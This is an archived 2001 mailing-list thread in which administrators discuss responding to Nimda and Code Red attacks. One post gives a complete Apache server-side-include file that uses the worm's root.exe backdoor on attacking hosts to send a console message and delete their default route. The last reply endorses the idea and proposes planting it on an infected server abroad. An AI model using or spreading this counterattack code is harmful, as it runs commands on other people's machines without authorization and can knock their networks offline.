As a non-lawyer, I don't see the problem. The key, to me, is that the
remote (infected) system initiated contact with me. If I went seeking out
vulnerable servers that had no prior contact with me, it would be different.
I'm not sure about the merits of removing their routing table, although I'd
imagine even a few web servers running something like this could
significantly reduce codered's effectiveness in the long run.
Perhaps find an already infected server in some far away land, and install
this little prize on it?
At 10:55 AM 9/24/2001 -0700, [EMAIL PROTECTED] wrote:
>Probably not a good idea. Does anyone remember the recent story about a
>gentleman that now has criminal charges pending against him because
>(trying to be helpful) he notified a company that their frontpage server
>extensions allowed anyone to access their server?
>
>This could really backfire on you...
>
>On Mon, 24 Sep 2001, Paul Chvostek wrote:
>
> >
> > Hi Asgard.
> >
> > I don't think you'll have any luck collecting the $1 per attack. My
> > approach is simpler, though likely to raise eyebrows. Input from
> > lawyers would be especially welcome. ;)
> >
> > My assumptions are:
> > - any host which is attacking my has vulnerabilities which should have
> > been patched months ago, and
> > - any unpatched server is being run by administrators or companies who
> > don't care enough about system uptime to implement proper security.
> >
> > I've created a default.ida file in my web root, and added lines to
> > Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
> >
> > <p>This host is immune to Code Red. Upgrade to a real operating
> system.</p>
> > <!--#exec cmd="/usr/local/bin/lynx -dump
>
>http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
>
> -->
> > <!--#exec cmd="/usr/local/bin/lynx -dump
> http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0"; -->
> >
> > If all goes as planned, the effect is to put a message on the console,
> > and remove the default route on the host thereby protecting the Internet
> > and forcing someone to look at the console.
> >
> > Note that this *only* catches machines which have been infected with
> > CodeRed2, which leaves a leftover /scripts/root.exe to play with.
> > If someone wants to tell me how to do this with some of the other
> > vulnerabilities that Nimda tries to use, I'd be grateful. :)
> >
> > p
> >
> >
> > On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
> > >
> > > Hi,
> > >
> > > Thought I'd post this here as this group seems to be one of the most
> > > eclectic and knowledgeable around. We're all aware of the current NIMDA
> > > worm attacks. I recently modified my IIS 404 error page to do a netblock
> > > lookup on the IP of the server trying to attack ours and then email the
> > > netblock owner and store the information in a database. Since doing that
> > > a little over 24hrs ago we've received 84807 attacks from 101 separate
> > > servers.
> > >
> > > Considering this worm uses exploits that got massive publicity with Code
> > > Red, I'm wondering about liability of companies that continue to run
> > > vulnerable servers? I'm seriously considering automatically reviewing
> > > all ip addresses 24hrs after they've first attacked and and if I'm
> > > still being attacked giving them a further 6 or 12 hours and then I'll
> > > charge them $1/attack until it stops. For god's sake it's a 15 min job
> > > at most to actually stop the virus, though longer to fully check and
> > > clear the server. Perhaps this sort of action might convince some people
> > > to finally take server patching seriously? Thoughts folks? Any lawyers
> > > on the list interested in taking it up? :-)
> > >
> > > Cheers,
> > > david
> >
> > --
> > Paul Chvostek <[EMAIL PROTECTED]>
> > Operations / Development / Abuse / Whatever vox: +1 416 598-0000
> > IT Canada http://www.it.ca/
> >
> >
========================================================
Dave Warren,
devilsplayground.net administrator
Email: [EMAIL PROTECTED]
========================================================
